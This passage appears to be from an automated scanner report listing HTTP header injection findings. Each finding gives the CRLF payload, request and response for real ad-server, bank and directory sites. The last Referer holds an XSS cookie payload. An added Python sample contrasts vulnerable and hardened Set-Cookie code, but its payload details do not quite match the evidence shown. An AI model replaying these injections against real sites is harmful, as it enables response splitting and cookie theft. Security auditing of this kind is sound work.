The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 92d63%0d%0a4e44e1eb37 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4386992~~0~~~^ebAdDuration~3~0~01020^ebRichFlashPlayed~0~0~01020&OptOut=0&ebRandom=0.25563961919397116&flv=10.1103&wmpv=92d63%0d%0a4e44e1eb37&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage;s1=homepage;pos=2;dcode=ocr;pcode=sant;kw=;ref=;test=;fci=ad;dcopt=;tile=5;sz=728x90;c1=uncategorized;ord=462404263671487.56?
Origin: http://ad.doubleclick.net
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=d3701055-7b90-43e3-9882-55604d1326cd3Gw060; expires=Wed, 04-May-2011 13:53:46 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=92d63
4e44e1eb37
; expires=Wed, 04-May-2011 13:53:46 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 03 Feb 2011 18:53:45 GMT
Connection: close
Content-Length: 0

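The server-side pattern behind findings 1.45 to 1.50 (a cookie field or a query parameter written back into Set-Cookie by concatenation), as an added example that is not part of the crawler report, shown beside two hardened versions. The names are this example's own; the cookie layout and the payload are copied from the 1.45 evidence above. The evidence also shows where the check has to live: the request carried %0d%0a literally inside the Cookie header and the server URL-decoded the field before echoing it, so a filter that only inspects the raw request would see nothing wrong.

```python
"""Added example (not part of the crawler report): the concatenating Set-Cookie
pattern reported in findings 1.45-1.50 next to two hardened versions.  Names
are this example's own; the cookie layout and payload are taken from 1.45."""
import re
import urllib.parse

# RFC 6265 cookie-octet: printable US-ASCII minus control chars, space, DQUOTE, comma, semicolon, backslash.
_COOKIE_VALUE = re.compile(r"[\x21\x23-\x2b\x2d-\x3a\x3c-\x5b\x5d-\x7e]*")
# RFC 7230 token, for the cookie name.
_TOKEN = re.compile(r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")
ATTRS = "expires=Wed, 04-May-2011 14:04:16 GMT; domain=bs.serving-sys.com; path=/"


def set_cookie_unsafe(name: str, value: str, attrs: str = ATTRS) -> str:
    """The vulnerable pattern: whatever the request carried is concatenated into the header."""
    return f"Set-Cookie: {name}={value}; {attrs}"


def set_cookie_safe(name: str, value: str, attrs: str = ATTRS) -> str:
    """Hardened: refuse anything outside the cookie grammar, so CR/LF can never reach the wire."""
    if not _TOKEN.fullmatch(name):
        raise ValueError(f"invalid cookie name: {name!r}")
    if not _COOKIE_VALUE.fullmatch(value):
        raise ValueError(f"invalid cookie value: {value!r}")
    return f"Set-Cookie: {name}={value}; {attrs}"


def set_cookie_encoded(name: str, value: str, attrs: str = ATTRS) -> str:
    """Alternative hardening when the value must be preserved: percent-encode, then validate.

    '=' and '&' are kept literal so the key=value&key=value layout of the cookie survives."""
    return set_cookie_safe(name, urllib.parse.quote(value, safe="=&"), attrs)


def lines_on_the_wire(header: str) -> list:
    """What a client sees once the header is serialized: one header per CRLF."""
    return header.split("\r\n")


def build_eyeblaster(wmpv: str) -> str:
    """The eyeblaster cookie value from the evidence, with the WMPV field under request control."""
    return f"BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV={wmpv}"


# Finding 1.45: the Cookie header carried '%0d%0a' literally; the server decoded the field
# before echoing it, so validation must run on the decoded value where the header is built.
REQUEST_WMPV = "07e614%0d%0a039b9159693"
DECODED_WMPV = urllib.parse.unquote(REQUEST_WMPV)   # '07e614\r\n039b9159693'

if __name__ == "__main__":
    tainted = build_eyeblaster(DECODED_WMPV)
    print(lines_on_the_wire(set_cookie_unsafe("eyeblaster", tainted)))   # two lines, second attacker-chosen
    try:
        set_cookie_safe("eyeblaster", tainted)
    except ValueError as exc:
        print("rejected:", exc)
    print(set_cookie_encoded("eyeblaster", tainted))
```

Rejecting the value (set_cookie_safe) is the right default when the field is machine-generated, as FLV, RES and WMPV are here; set_cookie_encoded keeps arbitrary values but whatever reads the cookie back must unquote them. In both cases the check sits where the header is assembled, after any decoding, which is the only place the decoded CR and LF are visible.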

1.51. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload aabf4%0d%0a30b9c2776ab was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=14&q=&$=aabf4%0d%0a30b9c2776ab&s=134&z=0.39839196810498834 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=4&t=4&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1; FFad=0; FFcat=1220,175,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:aabf4
30b9c2776ab
;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,14:1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=132
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:52 GMT
Connection: close
Content-Length: 2491

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat=',aabf4

...[SNIP]...

1.52. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload ca6b6%0d%0ab451cec5ae0 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=ca6b6%0d%0ab451cec5ae0&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:ca6b6
b451cec5ae0
;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=125
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:59 GMT
Connection: close
Content-Length: 2492

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat=',ca6b6

...[SNIP]...

1.53. https://customercare.suntrust.com/guides/bus_services.asp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://customercare.suntrust.com
Path:   /guides/bus_services.asp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 63309%0d%0a7cae529033e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /63309%0d%0a7cae529033e/bus_services.asp HTTP/1.1
Host: customercare.suntrust.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 13:40:25 GMT
Connection: close
Location: /Guides/404.html?404;http://customercare.suntrust.com/63309
7cae529033e
/bus_services.asp


1.54. https://customercare.suntrust.com/guides/contact_us.asp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://customercare.suntrust.com
Path:   /guides/contact_us.asp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ac2d3%0d%0ac45a5b7ea59 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ac2d3%0d%0ac45a5b7ea59/contact_us.asp HTTP/1.1
Host: customercare.suntrust.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 13:40:18 GMT
Connection: close
Location: /Guides/404.html?404;http://customercare.suntrust.com/ac2d3
c45a5b7ea59
/contact_us.asp


1.55. https://customercare.suntrust.com/guides/credit_cards.asp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://customercare.suntrust.com
Path:   /guides/credit_cards.asp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload c1afa%0d%0ab3b66e981f0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /c1afa%0d%0ab3b66e981f0/credit_cards.asp HTTP/1.1
Host: customercare.suntrust.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 14:22:06 GMT
Connection: close
Location: /Guides/404.html?404;http://customercare.suntrust.com/c1afa
b3b66e981f0
/credit_cards.asp


1.56. https://customercare.suntrust.com/guides/deposits.asp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://customercare.suntrust.com
Path:   /guides/deposits.asp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b116f%0d%0a7994da7a583 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b116f%0d%0a7994da7a583/deposits.asp HTTP/1.1
Host: customercare.suntrust.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 14:22:05 GMT
Connection: close
Location: /Guides/404.html?404;http://customercare.suntrust.com/b116f
7994da7a583
/deposits.asp


1.57. https://customercare.suntrust.com/guides/marine_lending.asp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://customercare.suntrust.com
Path:   /guides/marine_lending.asp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload c2767%0d%0aa8e07e5183f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /c2767%0d%0aa8e07e5183f/marine_lending.asp HTTP/1.1
Host: customercare.suntrust.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 14:22:07 GMT
Connection: close
Location: /Guides/404.html?404;http://customercare.suntrust.com/c2767
a8e07e5183f
/marine_lending.asp


1.58. https://customercare.suntrust.com/guides/merchant_services.asp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://customercare.suntrust.com
Path:   /guides/merchant_services.asp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4a3d1%0d%0a704833da91d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4a3d1%0d%0a704833da91d/merchant_services.asp HTTP/1.1
Host: customercare.suntrust.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 14:22:02 GMT
Connection: close
Location: /Guides/404.html?404;http://customercare.suntrust.com/4a3d1
704833da91d
/merchant_services.asp


1.59. https://customercare.suntrust.com/guides/mort_services.asp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://customercare.suntrust.com
Path:   /guides/mort_services.asp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9cb1a%0d%0a923c4ef6e41 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9cb1a%0d%0a923c4ef6e41/mort_services.asp HTTP/1.1
Host: customercare.suntrust.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 14:22:09 GMT
Connection: close
Location: /Guides/404.html?404;http://customercare.suntrust.com/9cb1a
923c4ef6e41
/mort_services.asp


1.60. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 97dc5%0d%0ad5802bb2bc3 was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=PFZ&si=18182&pi=H&xs=1&pu=http%253A//pbid.pro-market.net/engine%253Fsite%253D111778%253Bsize%253D1x1%253Bcategory%253D%253Bkw%253Dbanks%2526ifu%253Dhttp%25253A//www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/%2526cmmiss%253D-1%2526cmkw%253D&v=5.5&cb=4323 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://pbid.pro-market.net/engine?site=111778;size=1x1;category=;kw=banks
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; ANRTT=50213^1^1296913131|50212^1^1296760157|50220^1^1297353628; Tsid=0^1296748802^1296750628|18182^1296748802^1296750628; TData=99999|^|50012|51133|51184|52611|52615|52947|53575|54490|54898|54938|54954|56432|56555|56732|56733|56780|60425|60488|60490|60491|60506|60739|61674|#|50213|50212|50220; Anxd=x; N=2:22cab0f9b4ce99c1d3dd43221ef0019f,22cab0f9b4ce99c1d3dd43221ef0019f97dc5%0d%0ad5802bb2bc3; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMTI6NTAyMjA=

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:04:36 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Thu, 03 Feb 2011 16:19:36 GMT
Set-Cookie: ANRTT=50213^1^1296913131|50212^1^1296760157|50220^1^1297353876; path=/; expires=Thu, 10-Feb-11 16:04:36 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1296748802^1296750876|18182^1296748802^1296750876; path=/; expires=Thu, 03-Feb-11 16:34:36 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|50012|51133|51184|52611|52615|52947|53575|54490|54898|54938|54954|56432|56555|56732|56733|56780|60425|60488|60490|60491|60506|60739|61674|#|50213|50212|50220; expires=Sun, 29-Jan-12 16:04:36 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Thu, 03-Feb-11 22:04:36 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:22cab0f9b4ce99c1d3dd43221ef0019f97dc5
d5802bb2bc3
,22cab0f9b4ce99c1d3dd43221ef0019f; expires=Sun, 29-Jan-12 16:04:36 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMTI6NTAyMjA=; expires=Sun, 29-Jan-12 16:04:36 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 260
Content-Type: application/x-javascript
Content-Length: 260

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16if17a0kq0bgd';
var ANSL='99999|^|50012|51133|51184|52611|52615|52947|53575|54490|54898|54938|54954|56432|56555|56732|56733|56780|60425|60488|60490|
...[SNIP]...

1.61. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload e86db%0d%0a2247350a294 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=PFZ&si=e86db%0d%0a2247350a294&pi=H&xs=1&pu=http%253A//pbid.pro-market.net/engine%253Fsite%253D111778%253Bsize%253D1x1%253Bcategory%253D%253Bkw%253Dbanks%2526ifu%253Dhttp%25253A//www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/%2526cmmiss%253D-1%2526cmkw%253D&v=5.5&cb=4323 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://pbid.pro-market.net/engine?site=111778;size=1x1;category=;kw=banks
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; ANRTT=50213^1^1296913131|50212^1^1296760157|50220^1^1297353628; Tsid=0^1296748802^1296750628|18182^1296748802^1296750628; TData=99999|^|50012|51133|51184|52611|52615|52947|53575|54490|54898|54938|54954|56432|56555|56732|56733|56780|60425|60488|60490|60491|60506|60739|61674|#|50213|50212|50220; Anxd=x; N=2:22cab0f9b4ce99c1d3dd43221ef0019f,22cab0f9b4ce99c1d3dd43221ef0019f; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMTI6NTAyMjA=

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:03:36 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Thu, 03 Feb 2011 16:18:36 GMT
Set-Cookie: ANRTT=50213^1^1296913131|50212^1^1296760157|50220^1^1297353816; path=/; expires=Thu, 10-Feb-11 16:03:36 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1296748802^1296750816|18182^1296748802^1296750628|e86db
2247350a294
^1296749016^1296750816; path=/; expires=Thu, 03-Feb-11 16:33:36 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|50012|51133|51184|52611|52615|52947|53575|54490|54898|54938|54954|56432|56555|56732|56733|56780|60425|60488|60490|60491|60506|60739|61674|#|50213|50212|50220; expires=Sun, 29-Jan-12 16:03:36 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Thu, 03-Feb-11 22:03:36 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:22cab0f9b4ce99c1d3dd43221ef0019f,22cab0f9b4ce99c1d3dd43221ef0019f; expires=Sun, 29-Jan-12 16:03:36 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMTI6NTAyMjA=; expires=Sun, 29-Jan-12 16:03:36 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 92
Content-Type: application/x-javascript
Content-Length: 92

var ANUT=1;
var ANOO=0;
var ANSR=0;
var ANTID='16if17a0kq0bgd';
var ANSL;
ANRTXR();


1.62. http://www.supermedia.com/business-listings/business-profile [&tsrc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-listings/business-profile

Issue detail

The value of the &tsrc request parameter is copied into the Set-Cookie response header. The payload 68d81%0d%0a4d208d5e6db was submitted in the &tsrc parameter. This caused a response containing an injected HTTP header.

Request

GET /business-listings/business-profile?&tsrc=68d81%0d%0a4d208d5e6db&campaignId=BP:Update+Your+Profile+Top HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 17:05:35 GMT
Set-Cookie: JSESSIONID=45AE3CAD75B7C29FEEE090D42CF18AE6.app8-a1; Path=/
Set-Cookie: trafficSource="68d81
4d208d5e6db
"; Expires=Sat, 05-Mar-2011 17:05:33 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 17:05:33 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Your Business Profile | SuperMedia.com Advertising</title>



...[SNIP]...

1.63. http://www.supermedia.com/spportal/spportalFlow.do [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 3e3db%0d%0ab735c4f3a4c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /spportal/spportalFlow.do3e3db%0d%0ab735c4f3a4c?fromPage=login&_flowId=loginact-flow HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://www.supermedia.com/business-listings/business-profile?&tsrc=SP198c8%22%3balert(document.cookie)//96cb9badcf2&campaignId=BP:Update+Your+Profile+Top
